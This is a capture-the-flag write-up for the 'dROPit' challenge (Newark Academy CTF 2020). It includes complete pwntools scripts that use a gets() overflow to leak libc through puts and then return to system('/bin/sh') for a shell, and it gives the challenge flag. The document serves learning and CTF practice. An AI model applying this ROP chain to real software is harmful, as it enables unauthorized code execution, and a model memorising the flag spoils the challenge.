## dROPit

* **CTF:** Newark Academy CTF 2020
* **Category:** Binary exploitation 
* **Points:** 300
* **Author(s):** b0uldrr
* **Date:** 31/10/20

---

### Challenge
```
You're on your own this time. Can you get a shell?

nc challenges.ctfd.io 30261

-asphyxia

```
---

### Hint
```
https://libc.rip
```
---

### Downloads
* [dropit](dropit)
---

### Solution

This was my first successful ret2libc attack. I relied heavily on writeups from the [Return to What](https://ctftime.org/task/13024) challenge from [Downunder CTF 2020](https://ctftime.org/event/1084/) to learn the proocess. Particularly:
* https://github.com/datajerk/ctf-write-ups/tree/master/downunderctf2020/return_to_what
* https://miguelpduarte.me/blog/downunderctf-2020-writeup/#Return-to-what

The provided binary prints a `?` to screen, accepts user input, and then quits. Decompiling in Ghidra, we can see that the `main` function is vulnerable to a buffer overflow through the `gets` call.

![main](images/main.png)

The binary is 64-bit. Running `checksec` we can see that the program has a non-executable stack, but no stack canary is in place.

![checksec](images/checksec.png)

The plan of attack:
1. Determine the number of bytes we need to overflow to get to the return address on the stack.
1. Leak the address of `puts` from the GOT 
1. Take the last 3 bytes of that address and use https://libc.rip to determine which version of libc the remote server is using.
1. Download that version of libc and store it in the local diectory for reference by the python script
1. Leak the `puts` address again but return control to `main()`
1. Use that address to determine the offset of libc in memory (libc_address = leaked_puts - libc_puts)
1. Now with the base address of libc, we can overflow the buffer with a `system("/bin/sh")` call to get a shell

#### Determine the overflow amount using GDB peda:
1. `pattern create 200 pattern.txt`
1. `run < pattern.txt`
1. `x/wx $rsp`
1.  `pattern_offset`

#### Make a script to leak the address of puts():

```python
#!/usr/bin/python3

from pwn import *

binary = context.binary = ELF('./dropit')

local = False
if local:                                                                                                          
    conn = process(binary.path)                                                                                
    libc = binary.libc
else:                                                                                                              
    conn = remote('challenges.ctfd.io', 30261) 

rop = ROP([binary])
pop_rdi = rop.find_gadget(['pop rdi','ret'])[0]

# Overflow amount to return address. Gathered by GDB-Peda cyclical overflow
payload  = b'A' * 56

# Print puts address
payload += p64(pop_rdi)
payload += p64(binary.got.puts)
payload += p64(binary.plt.puts)

# Return to main()
payload += p64(binary.sym['main'])

conn.recvuntil('?\n')
conn.sendline(payload)

# Receive the address of puts()
puts_addr = u64(conn.recv(6).strip().ljust(8, b'\x00'))
print('puts addr   : ' + hex(puts_addr))
print('last 3 bytes: ' + hex(puts_addr)[-3:])
```

#### The leaked address of puts():

![putsaddress](images/puts_address.png)

#### Put that into https://libc.rip:

![libc](images/libc.png)

#### Create a script to determine the offset of libc and then overflow to system("/bin/sh"):

Looks like we're using `libc6_2.32-0ubuntu3_amd64.so` Download it and put it in the local directory of the python script for reference. Now we can leak the address of `puts` again and compare it with the address of `puts` in the libc library that we downloaded. This will allow us to determine the correct offset of libc in memory, and then we can correctly reference both `system()` and the `"/bin/sh"` string to call a shell.

Here's the complete script:

```python
#!/usr/bin/python3

from pwn import *

binary = context.binary = ELF('./dropit')

local = False
if local:                                                                                                          
    conn = process(binary.path)                                                                                
    libc = binary.libc
else:                                                                                                              
    conn = remote('challenges.ctfd.io', 30261) 
    libc = ELF('./libc6_2.32-0ubuntu3_amd64.so')

rop = ROP([binary])
pop_rdi = rop.find_gadget(['pop rdi','ret'])[0]

# Overflow amount to return address. Gathered by GDB-Peda cyclical overflow
payload  = b'A' * 56

# Print puts address
payload += p64(pop_rdi)
payload += p64(binary.got.puts)
payload += p64(binary.plt.puts)

# Return to main()
payload += p64(binary.sym['main'])

conn.recvuntil('?\n')
conn.sendline(payload)

# Receive the address of puts()
puts_addr = u64(conn.recv(6).strip().ljust(8, b'\x00'))
print('puts addr   : ' + hex(puts_addr))
print('last 3 bytes: ' + hex(puts_addr)[-3:])

# Determine the offset of libc
libc.address = puts_addr - libc.sym['puts']
print('offset      : ' + hex(libc.address))

payload  = b'A' * 56
payload += p64(pop_rdi + 1)
payload += p64(pop_rdi)
payload += p64(libc.search(b'/bin/sh').__next__())
payload += p64(libc.sym['system'])

conn.recvuntil('?\n')
conn.sendline(payload)
conn.interactive()
```

![flag](images/flag.png)

---

### Flag 
```
nactf{r0p_y0ur_w4y_t0_v1ct0ry_698jB84iO4OH1cUe}
```
